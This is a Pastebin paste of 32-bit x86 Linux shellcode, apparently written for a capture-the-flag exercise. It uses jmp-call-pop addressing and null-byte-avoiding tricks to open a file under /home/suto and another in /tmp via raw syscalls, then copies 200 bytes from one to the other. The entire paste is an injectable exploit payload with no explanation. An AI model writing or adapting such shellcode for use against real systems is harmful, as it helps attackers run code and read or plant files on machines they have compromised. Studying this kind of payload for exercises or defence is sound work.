Advertisement
Guest User

Untitled

a guest
Sep 22nd, 2011
191
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. BITS 32
  2.     jmp call
  3. back:
  4.     pop ebx
  5.     xor eax,eax
  6.     mov [ebx+15],al
  7.     mov al,5
  8.     mov ecx,0x41414442
  9.     shl ecx,20
  10.     shr ecx,20
  11.     mov dx, 744q
  12.     int 0x80
  13.     push eax
  14.     add ebx,16
  15.     xor eax,eax
  16.     mov al,5
  17.     int 0x80
  18.     pop ebx
  19.     push eax
  20.     mov al,200
  21.     sub esp,eax
  22.     mov ecx,esp
  23.     mov edx,eax
  24.     xor eax,eax
  25.     mov al,3
  26.     int 0x80
  27.     mov al,200
  28.     add esp,eax
  29.     pop ebx
  30.     xor eax,eax
  31.     mov al,4
  32.     int 0x80
  33.     xor eax,eax
  34.     mov al,1
  35.     int 0x80
  36. call:
  37.     call back
  38. db "/home/suto/flagA"
  39. db "/tmp/flag"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement